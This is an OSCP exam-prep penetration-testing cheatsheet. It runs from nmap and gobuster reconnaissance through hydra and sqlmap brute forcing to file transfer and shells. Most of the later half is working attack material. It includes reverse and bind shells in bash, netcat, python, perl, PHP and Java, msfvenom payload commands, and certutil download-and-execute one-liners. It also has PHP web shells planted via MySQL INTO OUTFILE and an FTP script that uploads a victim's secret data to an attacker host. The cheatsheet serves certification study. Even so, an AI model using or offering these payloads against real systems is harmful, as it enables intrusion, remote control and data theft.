The following collection is a wild (but structured) selection of commands, snippets, links, exploits, tools, lists and techniques I personally tested and used on my journey to becoming OSCP certified. I will extend, restructure and update it from time to time, so let's see where this is going.
THIS IS WORK IN PROGRESS
This cheatsheet is definitely not "complete". I am sure I forgot to write down hundreds of essential commands, used most of them in the wrong way with unnecessary flags, and you'll probably soon ask yourself how I even made it through the exam. Also you might think a certain tool should be in another phase of the attack (e.g. certain nmap vulnerability scripts should be under Exploitation). That's okay, imho the edges between different stages of a penetration test are very blurry. Feel free to issue a PR if you want to help improve the list. There are a number of tools you are not allowed to use during your OSCP exam. At the time of writing, sqlmap is one of them. Check which tools are restricted/banned before you use them in your exam. You can find detailed information about tool usage in the exam guidelines. Use for educational purposes only!
- OSCP Cheatsheet
- Reconnaissance
- Brute Force
- File Transfer
- Shells
## Reconnaissance

### AutoRecon

https://github.com/Tib3rius/AutoRecon

```bash
autorecon -vv 192.168.0.1
```

### nmap

Initial scan (top 1000 TCP ports, service detection):

```bash
nmap -v -sS -sV -Pn --top-ports 1000 -oA initial_scan_192.168.0.1 192.168.0.1
```

Full TCP port scan:

```bash
nmap -v -sS -Pn -sV -p 0-65535 -oA full_scan_192.168.0.1 192.168.0.1
```

If the SYN scan is taking very long to complete, the following command is an alternative (no service detection):

```bash
nmap -sT -p- --min-rate 5000 --max-retries 1 192.168.0.1
```

Top 100 UDP ports:

```bash
nmap -v -sU -T4 -Pn --top-ports 100 -oA top_100_UDP_192.168.0.1 192.168.0.1
```

Vulnerability scripts. `unsafe=1` also runs scripts that may crash the target service, so think twice on production systems; `nmap-vulners` is a third-party NSE script that has to be installed separately. The `smb-vuln*` glob is quoted so your shell does not expand it:

```bash
nmap -v -sS -Pn --script vuln --script-args=unsafe=1 -oA full_vuln_scan_192.168.0.1 192.168.0.1
nmap -v -sS -Pn --script nmap-vulners -oA vulners_scan_192.168.0.1 192.168.0.1
nmap -v -sS -p 445,139 -Pn --script 'smb-vuln*' --script-args=unsafe=1 -oA smb_vuln_scan_192.168.0.1 192.168.0.1
```

### gobuster

```bash
gobuster dir -e -u http://192.168.0.1 -w /usr/share/wordlists/dirb/big.txt -t 20
gobuster dir -e -u http://192.168.0.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20
gobuster dir -e -u http://192.168.0.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,cgi,sh,bak,aspx -t 20
```

For HTTPS targets with self-signed certificates set the `--insecuressl` flag (gobuster v2; in gobuster v3 the flag is `-k` / `--no-tls-validation`).
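A common follow-up to the fast `-sT -p- --min-rate 5000` sweep above is to run service detection only against the ports that came back open. The helper below is an added example, not part of the original cheatsheet: it pulls the open TCP ports out of nmap's grepable output (`-oG`, or the `.gnmap` file that `-oA` writes) and joins them into a `-p` list for a second, targeted scan. The `.gnmap` content it parses is constructed inline so the script runs offline; it assumes POSIX `sh` plus `grep -o`, which both GNU and BSD grep provide.

```shell
#!/bin/sh
# Added example (not from the original cheatsheet): extract open TCP ports from
# nmap grepable output so a quick sweep can feed a targeted -sV/-sC scan.
# Assumes POSIX sh with grep -o, cut, sort, paste (coreutils / BSD userland).

# ports_from_gnmap FILE -> prints e.g. "22,80,445" (open TCP ports, sorted, unique).
# UDP results ("/open/udp") are deliberately left out; scan those with -sU.
ports_from_gnmap() {
    grep -o '[0-9][0-9]*/open/tcp' "$1" \
        | cut -d/ -f1 \
        | sort -un \
        | paste -s -d, -
}

# write_sample_gnmap FILE -> writes a CONSTRUCTED .gnmap file (not real scan
# output) in the format nmap -oG produces, including a filtered port and a UDP
# line that the filter must ignore.
write_sample_gnmap() {
    {
        printf '# Nmap 7.94 scan initiated as: nmap -sT -p- --min-rate 5000 -oG quick_192.168.0.1 192.168.0.1\n'
        printf 'Host: 192.168.0.1 ()\tStatus: Up\n'
        printf 'Host: 192.168.0.1 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 135/filtered/tcp//msrpc///, 445/open/tcp//microsoft-ds///\tIgnored State: closed (65531)\n'
        printf 'Host: 192.168.0.1 ()\tPorts: 53/open/udp//domain///\n'
        printf '# Nmap done -- 1 IP address (1 host up) scanned in 12.34 seconds\n'
    } > "$1"
}

SAMPLE="$(mktemp)"
write_sample_gnmap "$SAMPLE"
OPEN_PORTS="$(ports_from_gnmap "$SAMPLE")"
echo "open TCP ports: $OPEN_PORTS"      # open TCP ports: 22,80,445
rm -f "$SAMPLE"

# Second stage, restricted to what is actually open (commented out so the
# example stays offline; with a real file use quick_192.168.0.1.gnmap):
# nmap -v -sT -sV -sC -p "$OPEN_PORTS" -oA targeted_192.168.0.1 192.168.0.1
```

Run the quick sweep with `-oG quick_192.168.0.1` (or `-oA`), then `ports_from_gnmap quick_192.168.0.1.gnmap` gives you the `-p` argument. Keeping the two stages separate is what makes the slow `-sV` affordable on a full 65535-port range.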
### smbclient

To fix `NT_STATUS_CONNECTION_DISCONNECTED` errors against old SMBv1-only hosts on new Kali installations, add `client min protocol = NT1` to the `[global]` section of `/etc/samba/smb.conf`.

List shares as guest, connect to a share as a user, and download a directory recursively (the paths inside `-c` are double-quoted so the backslashes survive your shell):

```bash
smbclient -U guest -L 192.168.0.1
smbclient \\\\192.168.0.1\\Users -U c.smith
smbclient '\\server\share' -N -c 'prompt OFF;recurse ON;cd "path\to\directory\";lcd "/path/to/download/to/";mget *'
```

Example:

```bash
smbclient \\\\192.168.0.1\\Data -U John -c 'prompt OFF;recurse ON;cd "\Users\John\";lcd "/tmp/John";mget *'
```

Show all information about a file, including alternate data streams:

```bash
smbclient \\\\192.168.0.1\\Data -U John -c 'allinfo "\Users\John\file.txt"'
```

Download an alternate data stream. Type the `get` at the `smb: \>` prompt of an interactive session, not in your shell, so `$DATA` is not expanded by bash:

```bash
smbclient \\\\192.168.0.1\\Data -U John
smb: \> get "\Users\John\file.txt:SECRET:$DATA"
```

### enum4linux

```bash
enum4linux 192.168.0.1
enum4linux 192.168.0.1 | grep -Ev '^(Use of)' > enum4linux.out
```

The `grep` drops the Perl `Use of uninitialized value` warnings that enum4linux prints.

### NFS

```bash
showmount -e 192.168.0.1
mkdir mpt
mount -t nfs -o soft 192.168.0.1:/backup mpt/
```

### Default credentials

https://github.com/pwnwiki/webappdefaultsdb/blob/master/README.md
## Brute Force

DISCLAIMER: There are a number of tools you are not allowed to use in your OSCP exam. At the time of writing, sqlmap is one of them. Check which tools are restricted/banned before you use them during your exam. You can find detailed information about tool usage in the exam guidelines.

### sqlmap

```bash
sqlmap -u "http://192.168.0.1/database/inject.php?q=user" --batch
sqlmap -u "http://192.168.0.1/database/inject.php?q=user" --batch --level=5 --risk=3
sqlmap --all -r post_request.txt --batch
sqlmap --all -r post_request.txt --batch --level=5 --risk=3
sqlmap -r post_request.txt --dbms "mysql" --os-shell
```

`post_request.txt` is the raw HTTP request saved from Burp (Copy to file).

### hydra

HTTP basic auth:

```bash
hydra -l admin -V -P /usr/share/wordlists/rockyou.txt -s 80 -f 192.168.0.1 http-get /phpmyadmin/ -t 15
```

HTTP GET form, with a session cookie:

```bash
hydra 192.168.0.1 -V -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt http-get-form "/login/:username=^USER^&password=^PASS^:F=Error:H=Cookie: safe=yes; PHPSESSID=12345myphpsessid" -t 15
```

Check the request in Burp to see the POST parameters. `-l` or `-L` has to be set, even if there is no user to log in with! The last `:`-separated field (`F=Error` above, `Invalid` below) is the string that marks a failed login; use `S=` to match on a success string instead. Use `https-post-form` instead of `http-post-form` for HTTPS sites.

```bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-post-form "/webapp/login.php:username=^USER^&password=^PASS^:Invalid" -t 15
```

MySQL (change `MYDATABASENAME`; the default database name is `mysql`):
```bash
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -vv mysql://192.168.0.1:3306/MYDATABASENAME -t 15
```

## File Transfer

### PowerShell

Download a file:

```powershell
powershell -ExecutionPolicy bypass -noprofile -c (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.1:80/winprivesc/JuicyPotato.exe','C:\Users\john\Desktop\juicy.exe')
```

Encoded command. Very helpful for characters that would otherwise need escaping. `-EncodedCommand` expects Base64 of the UTF-16LE bytes of the script, which is what `[System.Text.Encoding]::Unicode` produces; a Base64 of the plain UTF-8 string does not work:

```powershell
$Command = '(new-object System.Net.WebClient).DownloadFile("http://192.168.0.1:80/ftp.txt","C:\Windows\temp\ftp.txt")'
$Encoded = [convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($Command))
powershell.exe -NoProfile -EncodedCommand $Encoded
```

### certutil

```cmd
certutil.exe -urlcache -f http://192.168.0.1/shell.exe C:\Windows\Temp\shell.exe
```

Download and execute in one go from a Lua `os.execute` sink (backslashes are escaped because Lua string literals treat `\` as an escape character):

```lua
os.execute('cmd.exe /c certutil.exe -urlcache -split -f http://192.168.0.1/shell.exe C:\\Windows\\Temp\\shell.exe & C:\\Windows\\Temp\\shell.exe')
```

### SMB (impacket)

Attacker:

```bash
impacket-smbserver -smb2support server_name /var/www/html
```

Victim:

```cmd
net view \\192.168.0.1
copy \\192.168.0.1\server_name\shell.exe shell.exe
```

### FTP (pure-ftpd)

Install pure-ftpd on the attacker machine:

```bash
apt-get update && apt-get install pure-ftpd
```

Setup script (`setupftp.sh`, run as root):

```bash
#!/bin/bash
groupadd ftpgroup
# system account that owns the FTP files; a non-shell as login shell so it cannot log in interactively
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
# virtual FTP user mapped onto that system account; you are prompted for the password
pure-pw useradd myftpuser -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s /etc/pure-ftpd/conf/PureDB /etc/pure-ftpd/auth/40PureDB
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
```

```bash
./setupftp.sh
```

To set or change the password of the virtual user later, rebuild the DB and restart:

```bash
pure-pw passwd myftpuser -f /etc/pure-ftpd/pureftpd.passwd
pure-pw mkdb
/etc/init.d/pure-ftpd restart
```

On the Windows victim, build an FTP command file and run it non-interactively (the Windows `ftp` client does not read commands from stdin in a reverse shell, so `-s:` is needed; `put` uploads from the victim to the attacker, use `get` to download):

```cmd
echo open 192.168.0.1>> ftp.txt
echo USER myftpuser>> ftp.txt
echo mypassword>> ftp.txt
echo bin>> ftp.txt
echo put secret_data.txt>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt
```

### netcat

Receiver:

```bash
nc -l -p 1234 > out.file
```

Sender:

```bash
nc -w 3 192.168.0.1 1234 < out.file
```

### TFTP

Attacker:

```bash
atftpd --daemon --port 69 /var/tftp
```

Victim (Windows; `-i` selects binary mode):

```cmd
tftp -i 192.168.0.1 GET whoami.exe
```

### wget.vbs (Windows without PowerShell)

Create the script with `echo` from a cmd shell:

```cmd
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
```

Then download with it:

```cmd
cscript wget.vbs http://192.168.0.1/nc.exe nc.exe
```

## Shells

### Upgrade to a fully interactive TTY

```bash
python -c 'import pty;pty.spawn("/bin/bash");'
```

- In your active shell press `Ctrl+Z` to send your nc session to the background
- Enter `stty raw -echo`
- Enter `fg` to bring your nc session back to the foreground (your typing is not echoed now, so type it blind; if the shell does not return a prompt, press Enter once more)
- Enter `export TERM=xterm-256color`
### rlwrap

rlwrap enables the usage of arrow keys in your shell. https://github.com/hanslub42/rlwrap

### netcat reverse shell (Linux victim)

Attacker:

```bash
rlwrap nc -nlvp 4444
```

Victim:

```bash
nc 192.168.0.1 4444 -e /bin/bash
```

If `-e` is not supported (Debian's default `nc.openbsd` is built without it), try to find other versions of netcat on the box:

```
/bin/nc
/usr/bin/ncat
/bin/netcat
/bin/nc.traditional
```

### netcat reverse shell (Windows victim)

Attacker:

```bash
rlwrap nc -nlvp 4444
```

Victim:

```cmd
nc 192.168.0.1 4444 -e cmd.exe
```

### netcat bind shell (Linux victim)

Victim:

```bash
nc -nlvp 4444 -e /bin/bash
```

Attacker:

```bash
nc 192.168.0.1 4444
```

### netcat bind shell (Windows victim)

Victim:

```cmd
nc -nlvp 4444 -e cmd.exe
```

Attacker:

```bash
nc 192.168.0.1 4444
```

### bash

```bash
/bin/bash -i >& /dev/tcp/192.168.0.1/4433 0>&1
```

### python

One-liner:

```bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

As a script:

```python
import socket, subprocess, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.1", 4444))
# point stdin, stdout and stderr at the socket before spawning the shell
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])
```

### PHP

Kali ships ready-made PHP shells:

```bash
cat /usr/share/webshells/php/php-reverse-shell.php
cat /usr/share/webshells/php/php-backdoor.php
```

Version 1 (`shell_exec` runs through `/bin/sh`; if that is dash, as on Debian/Ubuntu, the bash-only `>&` redirection fails, so wrap the command in `bash -c '...'`):

```php
<?php echo shell_exec("/bin/bash -i >& /dev/tcp/192.168.0.1/4444 0>&1");?>
```

Version 2 (assumes the socket lands on file descriptor 3, which holds when nothing else is open; reliable with the CLI, less so under a web server):

```php
<?php $sock=fsockopen("192.168.0.1", 4444);exec("/bin/sh -i <&3 >&3 2>&3");?>
```

As command:

```bash
php -r '$sock=fsockopen("192.168.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
```

Minimal command shell:

```php
<?php echo system($_REQUEST["cmd"]); ?>
```

Call the CMD shell:

```
http://192.168.0.1/cmd_shell.php?cmd=whoami
```

A more comfortable PHP web shell: https://github.com/WhiteWinterWolf/wwwolf-php-webshell
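The netcat section above says to hunt for another netcat binary when `-e` is missing; the script below, an added example and not part of the original cheatsheet, automates that and adds the classic `mkfifo` relay, which gives a reverse shell with any netcat build because the shell's stdin/stdout are wired through a named pipe instead of `-e`. It is meant to be run on a Linux victim and assumes POSIX `sh`, `/bin/sh` on the box, and the cheatsheet's placeholder attacker address 192.168.0.1:4444 with `rlwrap nc -nlvp 4444` listening there. The `-e` detection (grepping the binary's help text) is a heuristic.

```shell
#!/bin/sh
# Added example (not from the original cheatsheet): pick a netcat binary on the
# victim and build a reverse shell command that works with or without -e.
# Assumes POSIX sh on the victim; LHOST/LPORT are the cheatsheet's placeholders.

# find_nc -> path of the first netcat binary that exists (empty + exit 1 if none)
find_nc() {
    for b in /bin/nc /usr/bin/nc /usr/bin/ncat /bin/netcat /bin/nc.traditional; do
        [ -x "$b" ] && { echo "$b"; return 0; }
    done
    return 1
}

# nc_has_e BIN -> exit 0 if BIN's help output advertises -e ("-e prog" or "-e, --exec")
nc_has_e() {
    "$1" -h 2>&1 | grep -q -- '-e[ ,]'
}

# revshell_cmd HOST PORT NC HAS_E(yes|no) -> the command line to run on the victim
revshell_cmd() {
    if [ "$4" = yes ]; then
        printf '%s %s %s -e /bin/sh\n' "$3" "$1" "$2"
    else
        # FIFO relay: bytes from the attacker come out of nc into the FIFO and
        # feed the shell's stdin; the shell's stdout/stderr go back into nc.
        printf 'rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | %s %s %s > /tmp/f\n' "$3" "$1" "$2"
    fi
}

LHOST=192.168.0.1
LPORT=4444
NC="$(find_nc)"
if [ -z "$NC" ]; then
    echo "[!] no netcat binary found; fall back to the bash /dev/tcp or python shells" >&2
else
    if nc_has_e "$NC"; then HAS_E=yes; else HAS_E=no; fi
    CMD="$(revshell_cmd "$LHOST" "$LPORT" "$NC" "$HAS_E")"
    echo "[*] using $NC (-e supported: $HAS_E)"
    echo "[*] $CMD"
    # uncomment to actually connect back:
    # eval "$CMD"
fi
```

The FIFO variant leaves `/tmp/f` behind and keeps `cat` and the shell running until the connection drops, so remove the pipe and kill the processes when you are done; the `-e` variant has neither artifact.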
### msfvenom

Windows x86 reverse shell:

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exe
```

Windows x86 bind shell:

```bash
msfvenom -p windows/shell_bind_tcp LPORT=4444 -f exe -o bind_shell.exe
```

Output as C-style hex, excluding bad chars, `EXITFUNC=thread` (for buffer overflow exploits; a bind shell needs no `LHOST`):

```bash
msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
```

Windows x64 reverse shell:

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exe
```

Windows x64 bind shell:

```bash
msfvenom -p windows/x64/shell_bind_tcp LPORT=4444 -f exe -o bind_shell.exe
```

Windows x64 Meterpreter:

```bash
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exe
```

Linux x86 reverse shell:

```bash
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f elf > rev_shell.elf
```

Linux x86 bind shell (`shell/bind_tcp` is a staged payload, so connect with `exploit/multi/handler` rather than plain nc to deliver the second stage):

```bash
msfvenom -p linux/x86/shell/bind_tcp LPORT=4444 -f elf > bind_shell.elf
```

Linux x64 reverse shell:

```bash
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f elf > rev_shell.elf
```

Linux x64 bind shell (staged, see above):

```bash
msfvenom -p linux/x64/shell/bind_tcp LPORT=4444 -f elf > bind_shell.elf
```

JSP reverse shell:

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f raw > shell.jsp
```

As .war:

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f war -o shell.war
```

ASPX reverse shell:

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f aspx -o rev_shell.aspx
```

### ASP (classic)

Download the payload via certutil:

```asp
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c certutil.exe -urlcache -f http://192.168.0.1/shell.exe C:\Windows\Temp\shell.exe")
o = cmd.StdOut.Readall()
Response.write(o)
%>
```

Execute it:

```asp
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c C:\Windows\Temp\shell.exe")
o = cmd.StdOut.Readall()
Response.write(o)
%>
```

### Java

Reverse shell that runs as-is in a Groovy console (e.g. the Jenkins script console); in a JSP scriptlet add the `java.net.*` and `java.io.*` imports. Linux target:

```java
String host="192.168.0.1";
int port=4444;
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
// pump bytes both ways until the socket closes or the shell exits
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();po.flush();
    Thread.sleep(50);
    try{p.exitValue();break;}catch(Exception e){}
}
p.destroy();s.close();
```

Windows target: identical, with `String cmd="cmd.exe";`.

### Perl

```bash
perl -MIO -e 'use Socket;$ip="192.168.0.1";$port=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($port,inet_aton($ip)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

### MySQL

Write a CMD shell into a file in the web root and call it over HTTP. This needs the `FILE` privilege, a `secure_file_priv` setting that does not restrict the target directory, and a web root the MySQL server process can write to. Try different paths for different webservers.

Windows:

```sql
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\backdoor.php";
```

Unix:

```sql
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php";
```